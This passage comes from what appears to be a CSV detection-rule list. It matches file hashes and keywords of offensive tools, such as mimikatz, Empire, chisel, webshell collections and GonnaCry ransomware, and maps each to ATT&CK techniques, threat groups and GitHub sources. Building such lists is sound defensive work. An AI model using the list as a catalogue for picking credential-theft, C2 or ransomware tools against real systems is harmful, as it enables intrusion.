Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37736" "*cc353aaa4dfe442dbee666feab014fb3804ed943711d41bef4c4ab13d2625a46*",".{0,1000}cc353aaa4dfe442dbee666feab014fb3804ed943711d41bef4c4ab13d2625a46.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37738" "*cc3f112ed5af9b0b4de3ab165c1a08b0d3d24323f8492f0513a0af9e06e95eff*",".{0,1000}cc3f112ed5af9b0b4de3ab165c1a08b0d3d24323f8492f0513a0af9e06e95eff.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - 
WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","37740" "*cc49a6056b1f2216c0986cd16b01d2fb5bc03664a2818a5ce3ecdc6a3132707c*",".{0,1000}cc49a6056b1f2216c0986cd16b01d2fb5bc03664a2818a5ce3ecdc6a3132707c.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","#filehash","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","37743" "*cc4e23ea2383b1649d22a6bd176f8b27505919a61d2e838ad337743c32702de7*",".{0,1000}cc4e23ea2383b1649d22a6bd176f8b27505919a61d2e838ad337743c32702de7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37744" "*cc53120b476000a0d75242ec02ea715ecf9a48386ccafb31e60d481ef267e707*",".{0,1000}cc53120b476000a0d75242ec02ea715ecf9a48386ccafb31e60d481ef267e707.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37745" "*cc541572d615cace2e8ea366aa1a91568559bd5f248405faba88a0d92a6e3211*",".{0,1000}cc541572d615cace2e8ea366aa1a91568559bd5f248405faba88a0d92a6e3211.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37747" "*cc5855ec2f5ac4e236e8e6cba698d4d307baa15a827c7719f4d6c8a58d28299b*",".{0,1000}cc5855ec2f5ac4e236e8e6cba698d4d307baa15a827c7719f4d6c8a58d28299b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37749" "*cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef*",".{0,1000}cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - 
Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37750" "*cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef*",".{0,1000}cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37751" "*cc5b8ca570f2f1aa9aed761a466007e7bd4b807f823e5add1d10fb732a034e9c*",".{0,1000}cc5b8ca570f2f1aa9aed761a466007e7bd4b807f823e5add1d10fb732a034e9c.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","37752" "*cc5f2e1b736d42c93cc10e7bab3004b24fe8c75ad565e1a65d3480b8bd1d1555*",".{0,1000}cc5f2e1b736d42c93cc10e7bab3004b24fe8c75ad565e1a65d3480b8bd1d1555.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","37753" "*cc65a1b922258d72afbe7391a32a58cecfddb9ee4be41de53cd8a52b9b67b277*",".{0,1000}cc65a1b922258d72afbe7391a32a58cecfddb9ee4be41de53cd8a52b9b67b277.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37757" "*cc715f31541c012d18607fa572cb5d802bfd4623a91d7ee0159e36ec3f2e5759*",".{0,1000}cc715f31541c012d18607fa572cb5d802bfd4623a91d7ee0159e36ec3f2e5759.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37758" 
"*cc72ad7e6e7983dac3a4407002be6b88afe56a73d887a58137963aa56216f110*",".{0,1000}cc72ad7e6e7983dac3a4407002be6b88afe56a73d887a58137963aa56216f110.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37759" "*cc762d44919d522ac0820401f1cdbc983865a9132728587f1dd47182d093fc88*",".{0,1000}cc762d44919d522ac0820401f1cdbc983865a9132728587f1dd47182d093fc88.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","37760" "*cc7f5f00092e920726e25cf3c47cbf36727e87aba7b4204408b9a44b67816b08*",".{0,1000}cc7f5f00092e920726e25cf3c47cbf36727e87aba7b4204408b9a44b67816b08.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","37761" "*cc81272307a9b746b67a9e9a52fbe5bc1f70f75c869480b517e16f34e20b80f5*",".{0,1000}cc81272307a9b746b67a9e9a52fbe5bc1f70f75c869480b517e16f34e20b80f5.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37762" 
"*cc81556dec6e809ac1b518fc24e1b035e1b82dd57aa7f78606332e1d40a2add6*",".{0,1000}cc81556dec6e809ac1b518fc24e1b035e1b82dd57aa7f78606332e1d40a2add6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37763" "*cc83886b15c006d0b3650f3327bf0264df635e6d11a3dd46680c8314bc6bd4f5*",".{0,1000}cc83886b15c006d0b3650f3327bf0264df635e6d11a3dd46680c8314bc6bd4f5.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","37764" "*CC848BD0-3B2D-4C1E-BFCF-75A9894A581D*",".{0,1000}CC848BD0\-3B2D\-4C1E\-BFCF\-75A9894A581D.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37765" "*cc8bb64ef855405aeb66e480e8e7a2a65f61d495718fed2825083916cedd5e4c*",".{0,1000}cc8bb64ef855405aeb66e480e8e7a2a65f61d495718fed2825083916cedd5e4c.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","37766" "*cc8ca4e1e0d6613bd6f040f098f59ff05cea4b9ca74262ec7319ce9846e51a6e*",".{0,1000}cc8ca4e1e0d6613bd6f040f098f59ff05cea4b9ca74262ec7319ce9846e51a6e.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","37767" "*cc9bd06b6d3513a61aa3f3f0f4e05072eb0ba40b46a1584b128fb46ccac87643*",".{0,1000}cc9bd06b6d3513a61aa3f3f0f4e05072eb0ba40b46a1584b128fb46ccac87643.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37772" "*cc9d7b88c9fe25358764727439bc55d5df36dc828b2b620b05c9b6129109588a*",".{0,1000}cc9d7b88c9fe25358764727439bc55d5df36dc828b2b620b05c9b6129109588a.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","37773" "*cc9f09bbdb9277265fd71b7575b1fdda3bc2f946*",".{0,1000}cc9f09bbdb9277265fd71b7575b1fdda3bc2f946.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","37774" "*cca7ff524237c189fb05d3b65ea0f53ee6663f2b6a7c25c28e620d1b0705c874*",".{0,1000}cca7ff524237c189fb05d3b65ea0f53ee6663f2b6a7c25c28e620d1b0705c874.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","37775" "*cca8ea4f924ecc36731feb68313fa716881065641c2dd1a9db45a687d1fe0999*",".{0,1000}cca8ea4f924ecc36731feb68313fa716881065641c2dd1a9db45a687d1fe0999.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37776" "*cca940a0ba81f0ab849d294e3399485f6bf82961997b66c2e093062e72a4d31e*",".{0,1000}cca940a0ba81f0ab849d294e3399485f6bf82961997b66c2e093062e72a4d31e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37777" 
"*cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963*",".{0,1000}cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37778" "*ccache2john.py*",".{0,1000}ccache2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","37779" "*ccache2john.py*",".{0,1000}ccache2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","37780" "*ccadb82e7bf79fc75084693b04d8679aebfc06be44ff4ed70fddecb5680fbc37*",".{0,1000}ccadb82e7bf79fc75084693b04d8679aebfc06be44ff4ed70fddecb5680fbc37.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","37781" "*ccadc33019cb57a56a268d0d6be1a9e242dd0881dbddc06f376a06c7c5846ed0*",".{0,1000}ccadc33019cb57a56a268d0d6be1a9e242dd0881dbddc06f376a06c7c5846ed0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 
- TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37782" "*ccaf8dda0e6569f46a12db288dbfeff95b91fdfa7beac679624e141dc92b05b2*",".{0,1000}ccaf8dda0e6569f46a12db288dbfeff95b91fdfa7beac679624e141dc92b05b2.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","37783" "*ccb0b3f1ac000921117e6695c3eb5892c70b7867a9efd00438295e3dcdbd2991*",".{0,1000}ccb0b3f1ac000921117e6695c3eb5892c70b7867a9efd00438295e3dcdbd2991.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","37784" "*ccb76b3f79b0450fa184f0397af54e3fcf485a796ed65100ad86aca81222582a*",".{0,1000}ccb76b3f79b0450fa184f0397af54e3fcf485a796ed65100ad86aca81222582a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37787" "*ccb9d0f9cd95c1665d9646771f7e21af912106f7cc7541c338552b66ca0df512*",".{0,1000}ccb9d0f9cd95c1665d9646771f7e21af912106f7cc7541c338552b66ca0df512.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from 
the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37788" "*ccbc5c84af4045835e6b001cdf845d63802e081cbb97d9625c12d8d0f9b6f852*",".{0,1000}ccbc5c84af4045835e6b001cdf845d63802e081cbb97d9625c12d8d0f9b6f852.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37789" "*ccc0e2dc580a30ad79f49871b99eedb891d9044e801bd633ba0af0505b8462b6*",".{0,1000}ccc0e2dc580a30ad79f49871b99eedb891d9044e801bd633ba0af0505b8462b6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37790" "*ccc1e522d2aed22b0cbc91a47fd0513689add203aa8e6d8a0857a430b00ab4a6*",".{0,1000}ccc1e522d2aed22b0cbc91a47fd0513689add203aa8e6d8a0857a430b00ab4a6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37791" "*ccd3694e0110b8416c04ad17e4d3f1e5fc9b724e29c942a70f3ff2283c4f8a79*",".{0,1000}ccd3694e0110b8416c04ad17e4d3f1e5fc9b724e29c942a70f3ff2283c4f8a79.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37794" "*ccd7652de457311135874574da9dc2cfdbb5cfc121c0ae158e85b78c311dd506*",".{0,1000}ccd7652de457311135874574da9dc2cfdbb5cfc121c0ae158e85b78c311dd506.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37795" 
"*ccde1cee6a570b7e54c7e02228a65a3a25a968d163314d072104fe0113ae5f7b*",".{0,1000}ccde1cee6a570b7e54c7e02228a65a3a25a968d163314d072104fe0113ae5f7b.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","37797" "*cce28e2789e65c0be2fdbf5605521babc06ada19020bb00d9314cd37757854e5*",".{0,1000}cce28e2789e65c0be2fdbf5605521babc06ada19020bb00d9314cd37757854e5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37799" "*cce469f76bb65315222426a32f579c4ba820587173b4dffb7f012f5b0bd5a877*",".{0,1000}cce469f76bb65315222426a32f579c4ba820587173b4dffb7f012f5b0bd5a877.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37800" "*ccea30c929a2846362b054a4692f6ea16c077b8860080b31245b15e12b27e5fb*",".{0,1000}ccea30c929a2846362b054a4692f6ea16c077b8860080b31245b15e12b27e5fb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN 
